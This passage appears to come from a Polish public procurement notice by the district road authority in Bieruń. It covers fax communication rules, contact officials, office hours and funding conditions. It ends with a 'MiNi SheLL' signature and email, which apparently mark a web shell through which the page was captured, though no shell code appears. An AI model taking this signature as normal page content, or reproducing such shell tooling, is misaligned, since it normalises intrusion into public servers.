Jeżeli Zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia lub inne informacje za pomocą faksu, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania (art. 27 ust. 2 ustawy p.z.p.).
2.  Osobami uprawnionymi do porozumiewania się z wykonawcami są:
Józef Piechula      -	Dyrektor Powiatowego Zarządu Dróg  w Bieruniu
Dorota Uzarek      -	Zastępca Dyrektora 
Patrycja Pamuła	  -	Podinspektor
Telefon kontaktowy:	(32) 216-21-73
Faks:		(32) 216-21-73
3. Informacji dotyczących postępowania o udzielenie zamówienia publicznego udziela się od poniedziałku do piątku            w godz. od 800 do 1530.

Informacja o zamiarze zawarcia umowy ramowej:
Zamawiający nie zamierza zawierać umowy ramowej.

Informacja o zamiarze ustanowienia dynamicznego systemu zakupów wraz z adresem strony internetowej, na której będą zamieszczane dodatkowe informacje dotyczące dynamicznego systemu zakupów:
Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com